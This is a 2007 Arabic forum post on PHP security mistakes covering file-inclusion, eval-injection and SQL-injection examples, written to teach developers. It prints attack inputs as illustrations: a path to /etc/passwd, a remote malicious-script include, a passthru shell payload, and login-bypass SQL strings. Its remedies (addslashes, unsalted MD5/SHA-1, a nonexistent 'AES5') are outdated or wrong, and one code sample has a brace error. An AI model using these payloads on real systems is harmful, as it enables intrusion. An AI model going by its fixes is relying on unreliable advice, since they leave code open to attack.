الصفحة الرئيسية :: الشركات الرسمية :: شركات الإستضافة :: شركات التصميم :: الشركات الاعلانية :: شركات الدعم الفني :: شروط إضافة موقع



العودة   شبكة آرا ويب التطويرية > المواقع والمنتديات > لغات برمجة المواقع
تحديث الصفحة أخطاء المبرمجين الأمنية فى Php (مهم جدا)
التسجيل البحث مشاركات اليوم اجعل كافة المشاركات مقروءة

رد
 
LinkBack أدوات الموضوع طرق مشاهدة الموضوع
قديم 05-May-2007, 08:42 PM   رقم المشاركة : 1 (permalink)

 

 
افتراضي أخطاء المبرمجين الأمنية فى Php (مهم جدا)

 

أهمية هذا المقال لمبرمجى اللغة هو التعرف على الأخطاء الأمنية العامة التى من الممكن أن تخلق ثغرات فى برامجهم و مع أن معظم المبادىء التى سوف أذكرها لحقاً تعتبر من البديهيات و لكن عدد لا بأس به من المبرمجين لا ينتبهون إلى مثل هذه الأخطاء ، و للأسف نحن جميعاً نفتقد التدريب الجيد على مفردات برامج صنعناها سابقاً بمعنى أنه من الثابت علمياً أن تنقيح و تطوير برمجيات كتبتها من قبل هو بمثابة تدريب جيد جداً لك لتلافى أخطائك السابقة و ايضاً لجعل شفرتك تحقق غاية البرنامج من طريق أسهل او أقصر ، ما علينا فلنبدأ.

1- لا تضمن فى برنامجك أبداً ملف مدخل من قبل مستخدم إلا بعد التأكد من إسم الملف (هناك عدة طرق للتأكد بالجافاسكربت ، أو بالبى اتش بى) ، أى لا تستخدم أبداً include , require , أو أى من دوال التضمين لملفات مدخلة حتى اسمائها من قبل مستخدمين قبل التأكد من صحة المدخلات.

كود:
مثال
if(isset($page))
{
include($page);
}

بما أنه لم يتم التأكد من إسم الملف $page و بناءً على أن register_globals فى وضع التشغيل مما يعنى أنه بإمكان المستخدم إدخال script.php?page=/etc/passwd
و بناءً على أنه عند تضمين أى إمتداد آخر غير بى اتش بى فإن مترجم اللغة يعرضه فى الصفحة كما هو إذا كان نص مثلاً ، تخيل أن شخصاً استطاع عرض /etc/passwd!!!!!

تأكد أيضاً من إعداد البى اتش بى الخاص بك حيث أن معظم الإعدادات يكون من المسموح فيها بتضمين ملفات من خوادم أخرى.

تأكد أيضاً من إعداد البى اتش بى الخاص بك حيث أن معظم الإعدادات يكون من المسموح فيها بتضمين ملفات من خوادم أخرى

كود:

مثال
script.php?page=http://mysite.com/mal_script.php

بإمكان هذا المستخدم تنفيذ أى شفرة على موقعك مثل التعامل مع SSI أو قواعد بياناتك و الحل هو التحقق من صحة مدخلات المستخدم بوضع قاعدة تحقق عملية تخدم غرض برنامجك.

كود:

مثال
$pages = array('index.html', 'page2.html', 'page3.html');
if( in_array($page, $pages) )
{
include($page);
{
else
{
die("Foot Bokra");
}


2- تمرير القيم المدخلة من قبل المستخدم لى الدالة eval لأنك بكل بساطة تعطى المستخدم الحق فى تنفيذ أى أوامر مثل:

كود:
script.php?input=;passthru("cat /etc/paswd");
و سوف يتسبب تنفيذ هذا الأمر إخراج ملف /etc/passwd.
إن إستخدام eval صحيح تماماً للتحقق من صحة مدخلات و لكن لابد من إستخدامها عند الضرورة ، لو أنك تستخدم فى برنامجك (Templates) مثلاً أو تستخدم الدالة لإستبدال المدخلات من قبل المستخدم ، إستخدم دالة sprintf بدلاً منها.



3- تأكد من الخروج من إستعلامات قواعد البيانات SQL Statement بمعنى أن اللغة نفسها تحتوى على خاصية الخروج من جمل SQL بإضافة شرطة مائلة \ قبل حروف معينة أدخلت بواسطة GET , POST , ****** و إحدى الأمثلة على هذه الحروف هو العلامة (') و لو أن المدخلات فى جملة الإستعلام تحتوى هذه العلامة فإن مترجم اللغة سوف يضيف تلقائياً شرطة مائلة \ لكى لا يتم معاملة الحرف (') كجزء من الإستعلام ، مثلاً إذا أدخل المستخدم $n*** فى النموذج form و جملة الإستعلام كالآتى:

كود:
UPDATE users SET N***='$n***' WHERE ID=1;
إذا كان المتغير يحتوى على الحرف (') فسوف يضاف الشرطة المائلة \ قبل الحرف و بالتالى لن يؤثر الحرف (') على جملة الإستعلام ، لنتخيل أن المستخدم أدخل المعطيات التالية:

كود:
$n***',Admin='1
الآن إستطاع المستخدم إدخال متغير آخر فى جملة الإستعلام و بالتالى حصل على المعلومات المطلوبة ، بإمكانك إستخدام الدوال التالية

كود:
addslashes() أو mysql_escape_string()
عند إستخدام متغيرات ممررة من خلال جملة الإستعلام و سوف يقوم بإدخالها المستخدم ، أيضاً الدالة magic_quotes_gpc فهى تضيف الشرطة المائلة تلقائياً و لكنها قد لا تكون فى وضع التشغيل و تستطيع إستخدام الدالة get_magic_quotes_gpc() لمعرفة إذا كانت فى وضع التشغيل أم لا و الأسهل هو إستخدام addslashes() من خلال حلقة تكرارية لإضافة الشرطة المائلة \ لكل المدخلات الممررة من قبل المستخدم.

4- عند تخزين كلمات المرور فى قاعدة البيانات تأكد من تشفيرها قبل التخزين فى قاعدة البيانات ، لأن قواعد البيانات غالباً ما تتبع حزمة الإستضافة الخاصة بك و غالباً أيضاً ما تكون الإستضافة تشاركية Shared Hosting إذن نستخلص أنك قد لا تعلم بعض الأشخاص المخولين بالدخول لقواعد البيانات ، بإستطاعتك تشفير كلمات المرور بإستخدام تقنيات عدة مثل 3DES أو AES5 و تستطيع فك التشفير لفترة بسيطة للتأكد من أن المستخدم قد أدخل كلمة المرور الصحيحة و الميزة الأساسية فى هذه الطرق هو أنها تعتمد فى التشفير و فك التشفير على مفتاح key يعرفه مدير الموقع ، و لكن هذه الطرق المذكورة بطيئة جداً و تعتمد على لوغاريتمات معقدة و الحل الأمثل لهذه المشكلة هو إستخدام إحدى دوال التشفير الرقمية Session hash functions مثل دالة SHA-1 أو md5.


5- تابع أخطاء جمل إستعلام SQL
لنفترض أن جملة الإستعلام التى تستخدمها فى برنامجك للتأكد من إسم المستخدم و كلمة المرور كالآتى:

$stmnt = SELECT login_id FROM users WHERE user = '" .
$_POST["usern***"] . "' AND password = '" . $_POST["password"];


لنفترض أيضاً أن المستخدم أدخل (#) بدلاً من كلمة المرور أى أن جملة الإستعلام أصبحت كالتالى:

كود:
SELECT login_id FROM users WHERE user = 'hani'; #' AND password = ''

بمعنى أنه إستطاع تحويل باقى جملة الإستعلام إلى تعليق بإستخدام الرمز (#) و من ثم أصبحت كلمة المرور خالية!!
إذن كل ما استخدمه المهاجم هو إسم مستخدم مسجل فى قاعدة البيانات و بالتالى إستخدم الرمز (#) لقصر جملة الإستعلام عند الرمز (#) الذى أصبح ما بعده (بقية جملة الإستعلام) عبارة عن تعليق و الحل ذكرناه مسبقاً بإستخدام addslashes().

6- إستكمالاً لما سبق عن أهمية تشفير كلمات المرور ، بى اتش بى تدعم تلقائياً دوال SHA-1 و أيضاً MD5 الذى تم تطويره فى التسعينيات و لكنه يدعم تشفير حتى 128-bit فقط ، مع العلم أن SHA-1 يدعم حتى 160-bit و سوف نستخدمه كمثال:

كود:
$insertSql .= "'" . sha1($_POST["password1"]) . ", ";

ربما تستغرب أننا لم نستخدم addslashes() كما أشرنا سابقاً و لكن لذلك سبب وجيه و هو أن SHA-1 تستخدم فقط الأرقام الستعشرية (Hexadecimal) أى (0 – 9 و A - F) بمعنى آخر الدالة لا تستخدم أى من الحروف الخطرة فى جمل الإستعلام مثل (').

بإمكانك التحقق من كلمتين المرور المشفرتين (المدخلة من قبل المستخدم ، و الموجودة مسبقاً فى قاعدة البيانات بإستخدام مثلاً:

كود:
$loginQuery .= " password = '". sha1($_POST["password"]) . "'";
إذا تم التأكد من كلمة المرور المدخلة بأنها مطابقة لتلك فى قاعدة البيانات فسوف نبدأ الجلسات إذن و أخطائها الأمنية.

منقووول للفائدة

 

 

 

 

 

 

 

 

 

 

   

رد مع اقتباس
رد

« الموضوع السابق | الموضوع التالي »

أدوات الموضوع
طرق مشاهدة الموضوع
العرض العادي العرض العادي

تعليمات المشاركة
لا تستطيع كتابة مواضيع
لا تستطيع كتابة ردود
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع إلى



الساعة الآن: 12:34 AM

الاتصال بنا - شبكة آرا ويب التطويرية - الأرشيف - الأعلى

Powered by  vBulletin
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Protected by CBACK.de CrackerTracker
مجموعات Google
اشتراك في
"مجموعة العالم التقني العربي"
Arab Technical World
البريد الإلكتروني:
زيارة هذه المجموعة

خدمات أون لاين عارض الالوان | صانع الميتا تاج | صانع الاعلانات المنبثقة | ترتيب موقعك | البحث عن دومين | جدول الالوان | صانع السكرول بار | صانع صفحة التحويل استعلام عن IP | قياس سرعة الانترنت | دخول CPanel & WHM | مولد كلمات المرور لينكات
الشركات والمواقع الشركات الرسمية | شركات الإستضافة | شركات التصميم | الشركات الاعلانية | شركات الدعم الفني | مواقع الإعلانات التجارية | مواقع التبادل الإعلاني لينكات
المنتديات البرامج العامه | تطوير المنتديات | استايلات النسخة الثالثة | مكتبة هاكات الجيل الثالث | المشاكل وحلولها | ثغرات المنتديات وترقيعها | معرض التصاميم وبرامج التصميم | تطوير المواقع | لغات برمجة المواقع | منتدى الديجي شات Digichat | عروض البيع والشراء | الشركات وتبادل الخبرات | الشركات وتبادل الخبرات | الـ VPS والريسلرات | التقنيه و الأمن و الحماية | السيرفراتلينكات
  جميع الحقوق محفوظة لمنتديات شبكة آرا ويب لخدمات الانترنت © 2007